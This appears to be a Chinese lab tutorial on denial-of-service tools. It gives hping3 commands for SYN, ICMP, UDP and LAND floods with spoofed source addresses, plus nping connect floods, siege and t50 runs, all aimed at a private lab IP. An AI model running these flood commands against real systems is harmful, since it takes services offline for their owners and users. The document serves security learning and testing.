二十八、拒绝服务--(9)拒绝服务攻击工具

1、RUDY

  • 慢速应用层http post攻击,与slowhttptest原理相同
  • 每次只传输一个字节的数据
  • 攻击有表单web页面,攻击时需指定攻击的参数名称

2、Hping3

  • 可以定制发送任何TCP/IP数据包,用于测试FW、端口扫描、性能测试
    Syn Flood攻击
 # hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.50.183

靶机使用tcpdump -i eth0 -s 0 -vv查看

靶机抓包

ICMP Flood攻击

# hping3 -q -n -a 1.1.1.1 --icmp -d 200 --flood 192.168.50.183

UDP Flood攻击

# hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 192.168.50.183

3、LAND攻击

  • 特殊种类的syn flood攻击
  • 源地址、目的地址都是受害者,受害者于自己完成三次握手
# hping3 -a 192.168.50.183 -S -d -p 22 --flood 192.168.50.183

4、TCP全连接DoS攻击

# nping --tcp-connect --rate=10000 -c 1000000000 -q 192.168.50.183

再次刷新访问tcp的80端口,无法正常显示


二十八、拒绝服务--(9)拒绝服务攻击工具_第1张图片
刷新无法显示

5、查公网IP

nping --echo-client "public" echo.nmap.org --udp

6、Siege压力测试

  • http/https压力测试工具,模拟多个用户并发访问请求
  • # siege -g http://192.168.50.183查看banner基本信息
siege -i -c 100 http://192.168.50.183/dvwa/login.php -A httttttptest -vv
二十八、拒绝服务--(9)拒绝服务攻击工具_第2张图片
攻击结果

二十八、拒绝服务--(9)拒绝服务攻击工具_第3张图片
使用定义的useragent
  • 同时统计多个url,使用-f调用字典文件 /etc/siege/urls.txt,随后直接使用siege -i -c 100 -vv

7、T50网络压力测试

# t50 192.168.50.183 --flood --turbo -S --protocol TCP --dport 22

你可能感兴趣的:(二十八、拒绝服务--(9)拒绝服务攻击工具)